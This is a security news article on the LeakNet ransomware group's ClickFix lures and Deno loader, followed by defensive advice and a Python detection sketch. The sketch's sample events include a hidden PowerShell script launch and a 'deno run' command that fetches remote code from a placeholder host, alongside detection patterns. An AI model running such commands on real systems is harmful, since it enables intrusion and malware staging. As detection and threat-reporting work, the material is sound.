Malware & Ransomware · HIGH

LeakNet Ransomware - New ClickFix Lures and Deno Loader

Cyber Security News

Basically, a ransomware group is using clever tricks to infect more computers quickly.

Quick Summary

LeakNet is ramping up its ransomware tactics with new ClickFix lures and a stealthy Deno loader. This shift poses serious risks to organizations as traditional defenses struggle to keep up. Enhanced monitoring and proactive measures are essential to combat these evolving threats.

What Happened

LeakNet, a ransomware group, is evolving its attack strategies. Previously, they targeted about three victims monthly. Recent findings indicate they are now scaling operations, leveraging new tools that can bypass standard security defenses. Two key innovations are a social engineering tactic called ClickFix and a stealthy loader based on the Deno JavaScript runtime.

The ClickFix method involves planting fake verification pages on compromised legitimate websites. When users encounter these pages, they see a familiar Cloudflare Turnstile check, prompting them to execute a command. This broad approach allows LeakNet to target a wider audience, as there is no specific victim profile. Analysts from ReliaQuest have linked this activity to LeakNet with high confidence, noting consistent tactics and infrastructure.

Who's Being Targeted

The shift to ClickFix puts any web-browsing employee at risk. Since the lures are hosted on legitimate sites, standard network defenses may not flag them, which raises the chance that a user interacts with the page. Once the malicious command is executed, it can trigger a series of harmful actions. The group also employs Microsoft Teams phishing as an initial access route; because the post-exploitation chain that follows is consistent across intrusions, defenders have a reliable pattern to detect, but the threat remains significant.

Signs of Infection

LeakNet's Deno-based loader is particularly concerning. The loader installs the legitimate Deno executable on the victim's machine and uses it to run malicious code, leaving few of the file traces a custom binary would. It is launched through scripts named Romeo*.ps1 and Juliet*.vbs. By using a bring-your-own-runtime approach, LeakNet minimizes the detection risk associated with deploying custom binaries.

Once activated, the loader collects system information and connects to attacker-controlled servers to fetch the next stage of the attack. This process remains largely invisible to signature-based security tools, making it a formidable threat.

How to Protect Yourself

Organizations should take immediate action to mitigate risks from LeakNet's tactics. Blocking newly registered domains can help, as the group's command-and-control servers are often short-lived. Additionally, preventing users from running commands through the Win+R Run dialog and limiting PsExec access to authorized administrators can reduce exposure. Security teams should monitor for unusual activity, such as jli.dll sideloading and unexpected outbound connections. Rapid isolation of compromised hosts is crucial to prevent ransomware deployment and protect sensitive data.
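A detection sketch for the host-side indicators named above: the Romeo*/Juliet* script names, the Deno runtime being spawned by a script host, and jli.dll loading from outside a Java install tree. This is an added example, not code from the article or from ReliaQuest; the event records, paths and URL are constructed, and the parent-process and Java-directory heuristics are assumptions rather than published detection logic.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry resembling process-creation / image-load events.
# Paths, user names and the URL are made up; none are real LeakNet indicators.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -ep bypass -f C:\Users\alice\AppData\Local\Temp\RomeoA1.ps1"},
    {"type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\alice\.deno\bin\deno.exe",
     "cmdline": r"deno.exe run -A https://example.invalid/stage2.ts"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\bob\Downloads\JulietX.vbs"},
    {"type": "imageload", "image": r"C:\Users\bob\AppData\Local\Temp\app.exe",
     "loaded": r"C:\Users\bob\AppData\Local\Temp\jli.dll"},
    {"type": "imageload", "image": r"C:\Program Files\Java\jdk-17\bin\java.exe",
     "loaded": r"C:\Program Files\Java\jdk-17\bin\jli.dll"},  # benign: real JDK
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": r'"C:\Program Files\Microsoft VS Code\Code.exe" --new-window'},  # benign
]

# Script names the article attributes to the loader (Romeo*.ps1 / Juliet*.vbs).
LOADER_SCRIPT = re.compile(r"\\(romeo|juliet)[^\\\s\"']*\.(ps1|vbs)\b", re.IGNORECASE)
# Assumption: script hosts that should rarely parent a Deno runtime on a workstation.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
# jli.dll is a legitimate Java launcher DLL; assumption: flag it only outside Java trees.
JAVA_DIRS = ("java", "jdk", "jre")

def _name(path):
    return PureWindowsPath(path).name.lower()

def detect(events):
    """Return (rule, event_index) pairs for events matching the described chain."""
    findings = []
    for i, ev in enumerate(events):
        if ev["type"] == "process":
            if LOADER_SCRIPT.search(ev["cmdline"]):
                findings.append(("loader_script_name", i))
            if _name(ev["image"]) == "deno.exe" and _name(ev["parent"]) in SCRIPT_HOSTS:
                findings.append(("deno_spawned_by_script_host", i))
        elif ev["type"] == "imageload" and _name(ev["loaded"]) == "jli.dll":
            parent_dir = str(PureWindowsPath(ev["loaded"]).parent).lower()
            if not any(d in parent_dir for d in JAVA_DIRS):
                findings.append(("jli_dll_sideload", i))
    return findings

if __name__ == "__main__":
    for rule, idx in detect(SAMPLE_EVENTS):
        print(f"[{rule}] event {idx}: {SAMPLE_EVENTS[idx]}")
```

Each rule is a heuristic meant to be tuned against the environment's own telemetry (a Java path convention other than the one assumed here will need JAVA_DIRS adjusted).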

🔒 Pro insight: LeakNet's use of Deno for payload execution exemplifies a growing trend where attackers leverage trusted runtimes to evade detection.

Original article from Cyber Security News · Tushar Subhra Dutta

